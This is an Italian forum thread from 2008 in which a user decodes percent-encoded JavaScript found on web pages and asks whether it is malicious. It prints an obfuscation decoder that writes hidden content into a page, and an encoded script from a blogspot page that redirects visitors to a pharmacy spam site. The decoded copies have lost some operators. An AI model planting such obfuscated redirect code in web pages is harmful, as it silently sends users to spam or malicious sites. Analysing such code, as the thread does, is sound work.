%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D tradotto: Codice PHP: `function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_ ){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_ =Z_;};for(A_=0;A_<B_.length;A_ ){Z_=B_.charAt(A_);if(T_.length>1024){S_ ;N_[S_]=T_;T_=""}if(Z_=="%"){A_ ;T_ =L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_ =L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_ =Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_] T_;document.write((document.layers\|\|document.all)?unescape(escape(T_)):T_)` non è maligno,giusto? da cosa ve ne accorgete?

02-04-2008, 18:04	#3
juninho85 Bannato Iscritto dal: Mar 2004 Città: Galapagos Attenzione:utente flautolente,tienilo a mente Messaggi: 28983	questo invece dovrebbe esser maligno Codice PHP: `zi6c1zjsocfi1.blogspot.com` Codice PHP: `<p><script language="javascript">document.write(unescape("[b]%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%62%6F%75%67%68%74%6D%6F%72%65%2E%63%6F%6D%22%29%3B%3C%2F%73%63%72%69%70%74%3E[/b]"));</script></p>` tradotto: Codice PHP: `<scriptlanguage="javascript">location.replace("http://boughtmore.com");</script>` anche se reindirizza a Codice PHP: `http://boughtmore.com` di per se non sembra malevolo,a meno che per voi fare un pò di scorta di cialis lo sia

03-04-2008, 09:56	#7
juninho85 Bannato Iscritto dal: Mar 2004 Città: Galapagos Attenzione:utente flautolente,tienilo a mente Messaggi: 28983	in poche parole "basta" essere in grado di capire il linguaggio...è il caso che mi metta a studiare

Strumenti
Mostra una versione stampabile Invia questa pagina per email